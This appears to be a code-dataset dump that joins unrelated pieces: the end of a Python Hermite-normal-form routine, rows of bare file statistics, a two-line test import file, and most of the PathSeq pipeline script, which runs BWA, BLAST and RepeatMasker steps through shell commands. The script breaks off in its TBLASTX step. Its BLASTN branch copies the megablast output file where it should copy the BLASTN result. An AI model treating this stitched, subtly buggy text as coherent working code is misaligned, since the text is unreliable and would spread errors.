if (2*d)%a == 0:
b11 = -2*a+2*b+2*d-(2*b*d/float(a))
if b11%c == 0:
g21 = ((-2*d*e)/float(a)) - ((e * (2*e-(2*b*e/a))/float(c)))
if g21%f == 0:
g11 = 2*d - ((2*d*d)/float(a))-((b11 * e) / float(c))
if g11%f == 0:
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
| 24.415541
| 100
| 0.449287
| 1,023
| 7,227
| 3.128055
| 0.082111
| 0.010625
| 0.091875
| 0.109375
| 0.897813
| 0.880938
| 0.854688
| 0.854688
| 0.845938
| 0.839688
| 0
| 0.107895
| 0.421613
| 7,227
| 295
| 101
| 24.498305
| 0.657656
| 0.32005
| 0
| 0.808219
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047945
| false
| 0
| 0.047945
| 0
| 0.143836
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5939a0448323bdaa277429294c56769cc6dca4ff
| 80
|
py
|
Python
|
dali/gallery/tests/__init__.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | 1
|
2016-05-08T11:45:54.000Z
|
2016-05-08T11:45:54.000Z
|
dali/gallery/tests/__init__.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | null | null | null |
dali/gallery/tests/__init__.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | null | null | null |
from dali.gallery.tests.models import *
from dali.gallery.tests.admin import *
| 20
| 39
| 0.7875
| 12
| 80
| 5.25
| 0.583333
| 0.253968
| 0.47619
| 0.634921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1125
| 80
| 3
| 40
| 26.666667
| 0.887324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3caf4ae0d9213cf97c80bd251d28fa96ee772835
| 54,602
|
py
|
Python
|
steps.py
|
ChandraPedamallu/PathSeq
|
2d92791713a7350ad6eb0540bf9cddad46b50049
|
[
"MIT"
] | 9
|
2018-02-04T23:45:14.000Z
|
2021-05-13T05:30:58.000Z
|
steps.py
|
ChandraPedamallu/PathSeq
|
2d92791713a7350ad6eb0540bf9cddad46b50049
|
[
"MIT"
] | 5
|
2017-07-10T12:56:19.000Z
|
2018-11-13T19:52:29.000Z
|
steps.py
|
ChandraPedamallu/PathSeq
|
2d92791713a7350ad6eb0540bf9cddad46b50049
|
[
"MIT"
] | 2
|
2017-10-16T21:30:08.000Z
|
2019-12-30T11:02:22.000Z
|
#!/usr/bin/env python
# Created: Chandra Sekhar Pedamallu, DFCI, The Broad Institute
# Email : pcs.murali@gmail.com
# Purpose: PathSeq2.0 pipeline
# Updates: Steps involved in the pipeline
# DFCI / Broad Institute@ copyright
import sys
import os
import commands
import random
import time
import shutil
import glob
start_time = time.time()
# Call a Read Mapped versus unmapped"
premega_thres=" 0.9 0.95 "
blastn_thres=" 1E-7 "
megablast_thres=" 1E-7 "
blastx_thres=" 0.01 "
hash_length="21"
minlength_contigs="75"
# Call a Read Mapped versus unmapped"
print "PATHSEQ PIPELINE RUNS\n"
print "STEPs*********************"
#Arguments
args=sys.argv
print "Step 0: Read config, premegablast, megablast, and blastn config files"
# Strip off spaces infornt and behing the lines and get file name
namefile = args[1].strip() # Read in FQ1 format
configfile = args[2].strip()
nthreads = args[3].strip()
nextconfiglist = args[4].strip()
pdir=args[5].strip()
cdir=args[6].strip()
full_file=args[7].strip()
total_split=args[8].strip()
id_step=args[9].strip()
compute=args[10].strip()
namefile_o=args[11].strip()
print configfile
# Program Settings
Institute=args[12].strip()
# PathSeq installation or unzip location
PathSeq_loc=args[13].strip()
PathSeq_java=PathSeq_loc + "/Java"
# Temporary directory Location
Tmp_dir=args[14].strip()
# Java library Location
Java=args[15].strip()
# BWA Location
Bwa_loc=args[16].strip()
# BLAST Location
Blast_loc=args[17].strip()
# Repeatmasker Location
Repeatmasker_loc=args[18].strip()
# Python Location
Python=args[19].strip()
# Loader_package
Package_loader=args[20].strip()
# Loader Location
Loader_file=args[21].strip()
# Assembler location
Assembler_loc=args[22].strip()
# Original Configfile
O_config=args[23].strip()
# Original Inputfile
O_inputfile=args[24].strip()
# Original Inputfile
Samtools=args[25].strip()
mergesamjar=PathSeq_loc + "/3rdparty/MergeSamFiles.jar"
# Run the loader file
if Package_loader == "YES":
print Loader_file
loader_cmd=commands.getstatusoutput(Loader_file)
print loader_cmd
ff = open(configfile, 'r')
database = ff.readlines()
ff.close()
dbindex=0
print "Hello"
print "Statistics before config on the partition"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + "."
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
# Write the respective database file into config files and upload them
for no_databases1 in database:
dbindex = dbindex + 1
line = no_databases1.strip()
data_split=line.split(":")
print data_split
if data_split[0] == "BWA":
print "BWA";
# Convert the FQ1 to Fastq
fq1_2_fastq = Java + " -classpath "
fq1_2_fastq = fq1_2_fastq + PathSeq_java
fq1_2_fastq = fq1_2_fastq + " FQone2Fastq "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + " "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + ".fastq"
print fq1_2_fastq
fq1_2_fastq_cmd=commands.getstatusoutput(fq1_2_fastq)
print fq1_2_fastq_cmd
# Run BWA alignment Step1
bwa_aln = Bwa_loc + " aln "
bwa_aln = bwa_aln + "-t "
bwa_aln = bwa_aln + nthreads
bwa_aln = bwa_aln + " "
bwa_aln = bwa_aln + data_split[1]
bwa_aln = bwa_aln + " "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".fastq"
bwa_aln = bwa_aln + " > "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".aln.sai"
print bwa_aln
bwa_aln_cmd=commands.getstatusoutput(bwa_aln)
print bwa_aln_cmd
# Run BWA alignment Step2
bwa_aln = Bwa_loc + " samse "
bwa_aln = bwa_aln + data_split[1]
bwa_aln = bwa_aln + " "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".aln.sai "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".fastq"
bwa_aln = bwa_aln + " > "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + "."
bwa_aln = bwa_aln + str(id_step)
bwa_aln = bwa_aln + "_"
bwa_aln = bwa_aln + str(dbindex)
bwa_aln = bwa_aln + ".aln.sam"
print bwa_aln
bwa_aln_cmd=commands.getstatusoutput(bwa_aln)
print bwa_aln_cmd
# Run Extract Unmapped reads
extract_unmapped = Java + " -classpath "
extract_unmapped = extract_unmapped + PathSeq_java
extract_unmapped = extract_unmapped + " BWAunmapped_June2016 "
extract_unmapped = extract_unmapped + namefile
extract_unmapped = extract_unmapped + " "
extract_unmapped = extract_unmapped + namefile
extract_unmapped = extract_unmapped + "."
extract_unmapped = extract_unmapped + str(id_step)
extract_unmapped = extract_unmapped + "_"
extract_unmapped = extract_unmapped + str(dbindex)
extract_unmapped = extract_unmapped + ".aln.sam "
extract_unmapped = extract_unmapped + namefile
extract_unmapped = extract_unmapped + ".tmp"
print extract_unmapped
extract_unmapped_cmd=commands.getstatusoutput(extract_unmapped)
print extract_unmapped_cmd
# Copy the unmapped reads
copy="mv "+ namefile
copy=copy + ".tmp "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
# Copy the unmapped reads
copy="cp "+ namefile
copy=copy + " "
copy=copy + namefile
copy=copy + ".unmappedbwa.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after BWA Step"
stat="wc -l < "+ namefile
stat=stat + ".unmappedbwa.fq1."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + " > "
stat=stat + namefile
stat=stat + ".bwa."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "MEGABLAST":
print "MEGABLAST";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
# Megablast on reads
mega=Blast_loc + "blastn -task megablast -query "
mega=mega + namefile
mega=mega + ".fasta -db \""
mega=mega + data_split[1]
mega=mega + "\" -outfmt 5 -evalue 0.0000001 -word_size 16 -max_target_seqs 5 -dust no -num_threads "
mega=mega + nthreads
mega=mega + " -out "
mega=mega + namefile
mega=mega + ".mega.out"
print mega
mega_cmd=commands.getstatusoutput(mega)
print mega_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".mega.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".mega.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".mega.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".mega.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".mega.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".mega.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".mega.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + megablast_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedmega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedmega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads to original file for running next round of database
copy="cp "+ namefile
copy=copy + ".unmappedmega.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after Megablast Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".mega."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "BLASTN":
print "BLASTN";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
blastn=Blast_loc + "blastn -task blastn -query "
blastn=blastn + namefile
blastn=blastn + ".fasta -db \""
blastn=blastn + data_split[1]
blastn=blastn + "\" -outfmt 5 -evalue 0.0000001 -reward 1 -penalty -3 -gapopen 5 -gapextend 2 -dust no -max_target_seqs 5 -num_threads "
blastn=blastn + nthreads
blastn=blastn + " -out "
blastn=blastn + namefile
blastn=blastn + ".blastn.out"
print blastn
blastn_cmd=commands.getstatusoutput(blastn)
print blastn_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml +PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".blastn.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".blastn.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".blastn.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".blastn.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".blastn.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".blastn.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".blastn.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastn_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads to original file for running next round of database
copy="cp "+ namefile
copy=copy + ".unmappedmega.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after BLASTN Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".blastn."
stat=stat + str(id_step)
stat=stat + str("_")
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "REPEATMASKER":
print "REPEATMASKER";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta_RepeatMasker "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
# Running Repeatmasker
repmask=Repeatmasker_loc + "RepeatMasker"
repmask=repmask +" -no_is -pa "
repmask=repmask + nthreads
repmask=repmask + " -species vertebrates "
repmask=repmask + namefile
repmask=repmask + ".fasta"
print repmask
repmask_cmd=commands.getstatusoutput(repmask)
print repmask_cmd
# Find repeatmasker file
repfile=namefile + ".fasta.masked"
print repfile
repfile_cmd=os.path.exists(repfile)
print repfile_cmd
if repfile_cmd: # Masked file is present
#Convert Repeatmaskerread.java file
#Remove the sequence with more N's
repread=Java + " -classpath "
repread=repread + PathSeq_java
repread=repread + " RepeatMaskerRead "
repread=repread + namefile
repread=repread + ".fasta.masked"
repread=repread + " "
repread=repread + namefile
repread=repread + " "
repread=repread + namefile
repread=repread + ".new.fq1"
repread=repread + " 2"
print repread
repread_cmd=commands.getstatusoutput(repread)
print repread_cmd
copy="cp " + namefile
copy=copy + ".new.fq1 "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
else: # no masking present
print "Nothing to be done"
copy="cp "+ namefile
copy=copy + " "
copy=copy + namefile
copy=copy + ".afterrep.fq1"
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
copy="cp " + namefile
copy=copy + " "
copy=copy + namefile
copy=copy + ".unmappedrepeatmasker.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after REPEATMASKER Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".repeatmasker."
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "PREMEGABLAST":
print "PREMEGABLAST";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
#Pre-Megablast on reads
mega=Blast_loc + "blastn -task megablast -query "
mega=mega + namefile
mega=mega + ".fasta -db \""
mega=mega + data_split[1]
mega=mega + "\" -outfmt 5 -evalue 0.0000001 -word_size 16 -max_target_seqs 5 -dust no -num_threads "
mega=mega + nthreads
mega=mega + " -out "
mega=mega + namefile
mega=mega + ".premega.out"
print mega
mega_cmd=commands.getstatusoutput(mega)
print mega_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".premega.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".premega.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java + " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".premega.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".premega.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".premega.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".premega.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_Adapterblast "
unmap=unmap + namefile
unmap=unmap + ".premega.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + premega_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedpremega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedpremega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads to original file for running next round of database
copy="cp "+ namefile
copy=copy + ".unmappedpremega.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after PREMEGABLAST Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".premega."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "BLASTX":
print "BLASTX";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
blastx=Blast_loc + "blastx -query "
blastx=blastx + namefile
blastx=blastx + ".fasta -db \""
blastx=blastx + data_split[1]
blastx=blastx + "\" -outfmt 5 -evalue 1 -gapopen 11 -gapextend 1 -max_target_seqs 5 -num_threads "
blastx=blastx + nthreads
blastx=blastx + " -out "
blastx=blastx + namefile
blastx=blastx + ".blastx.out"
print blastx
blastx_cmd=commands.getstatusoutput(blastx)
print blastx_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".blastx.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".blastx.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".blastx.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".blastx.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".blastx.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".blastx.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".blastx.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastx_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads to original file for running next round of database
copy="cp " + namefile
copy=copy + ".unmappedblastx.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after BLASTX Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".blastx."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "TBLASTX":
print "TBLASTX";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
tblastx=Blast_loc + "tblastx -query "
tblastx=tblastx + namefile
tblastx=tblastx + ".fasta -db \""
tblastx=tblastx + data_split[1]
tblastx=tblastx + "\" -outfmt 5 -evalue 1 -max_target_seqs 5 -num_threads "
tblastx=tblastx + nthreads
tblastx=tblastx + " -out "
tblastx=tblastx + namefile
tblastx=tblastx + ".tblastx.out"
print tblastx
tblastx_cmd=commands.getstatusoutput(tblastx)
print tblastx_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".tblastx.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".tblastx.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
